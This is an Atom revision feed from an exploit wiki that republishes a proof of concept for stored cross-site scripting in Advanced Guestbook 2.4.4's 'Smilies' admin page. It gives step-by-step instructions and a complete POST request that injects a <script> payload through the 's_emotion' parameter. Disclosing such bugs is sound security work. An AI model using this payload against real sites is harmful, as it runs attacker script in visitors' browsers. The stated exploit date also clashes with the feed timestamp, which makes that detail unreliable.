<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Advanced Guestbook 2.4.4 - 'Smilies' XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T22:32:02Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E&amp;diff=2890&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==XSS== &lt;pre&gt; # Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Home...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Advanced_Guestbook_2.4.4_-_%27Smilies%27_XSS%E6%BC%8F%E6%B4%9E&amp;diff=2890&amp;oldid=prev"/>
		<updated>2021-05-17T10:25:31Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==XSS== &amp;lt;pre&amp;gt; # Exploit Title: Advanced Guestbook 2.4.4 - &amp;#039;Smilies&amp;#039; Persistent Cross-Site Scripting (XSS) # Date: 17/08/2021 # Exploit Author: Abdulkadir AYDOGAN # Vendor Home...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)&lt;br /&gt;
# Date: 17/08/2021&lt;br /&gt;
# Exploit Author: Abdulkadir AYDOGAN&lt;br /&gt;
# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook&lt;br /&gt;
# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook&lt;br /&gt;
# Version: 2.4.4&lt;br /&gt;
&lt;br /&gt;
Advanced Guestbook is a free open source guestbook script developed in PHP.&lt;br /&gt;
Examples of features include email notifications, uploading pictures, html&lt;br /&gt;
tags handling, multiple polls, comments and themes.&lt;br /&gt;
&lt;br /&gt;
#Description&lt;br /&gt;
The following is PoC to use the XSS bug with authorized user.&lt;br /&gt;
&lt;br /&gt;
Firstly there are four part of a emotion object which is :&lt;br /&gt;
&lt;br /&gt;
- Emotion icon&lt;br /&gt;
- Emotion file name&lt;br /&gt;
- Emotion command which will be used to call this object (s_code)&lt;br /&gt;
- Emotion description (s_emotion)&lt;br /&gt;
&lt;br /&gt;
Here is the exploitation steps for vulnerability:&lt;br /&gt;
&lt;br /&gt;
1. Login to your admin account.&lt;br /&gt;
2. Go to &amp;quot;Smilies&amp;quot; tab to view and edit emotion icons&lt;br /&gt;
3. Click &amp;quot;edit&amp;quot; text in the &amp;quot;Action&amp;quot; column to edit emotions&lt;br /&gt;
4. Change emotion description to Javascript code&lt;br /&gt;
5. Click the &amp;quot;Submit Settings&amp;quot;&lt;br /&gt;
6. Click &amp;quot;Smilies&amp;quot; tab again to view all emotions and Javascript code will&lt;br /&gt;
be executed&lt;br /&gt;
&lt;br /&gt;
# Vulnerable Parameter Type: POST&lt;br /&gt;
# Vulnerable Parameter: s_emotion&lt;br /&gt;
# Attack Pattern: &amp;lt;script&amp;gt;alert(&amp;quot;Smile more!&amp;quot;)&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#PoC&lt;br /&gt;
HTTP Request:&lt;br /&gt;
&lt;br /&gt;
POST /advancedguestbook/admin.php HTTP/1.1&lt;br /&gt;
Host: HOST_ADDRESS&lt;br /&gt;
Content-Length: 175&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Origin: http://HOST_ADDRESS&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36&lt;br /&gt;
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36&lt;br /&gt;
Accept:&lt;br /&gt;
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer:&lt;br /&gt;
http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&amp;amp;session=17395de9919fffa0ac9476370c2c7ba0&amp;amp;uid=1&amp;amp;edit_smilie=7&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8&lt;br /&gt;
Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;&lt;br /&gt;
_gat=1&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
s_code=:cool:&amp;amp;s_emotion=&amp;lt;script&amp;gt;alert(&amp;quot;Smile&lt;br /&gt;
more!&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;edit_smilie=7&amp;amp;uid=1&amp;amp;session=17395de9919fffa0ac9476370c2c7ba0&amp;amp;action=smilies&amp;amp;add_smilies=1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>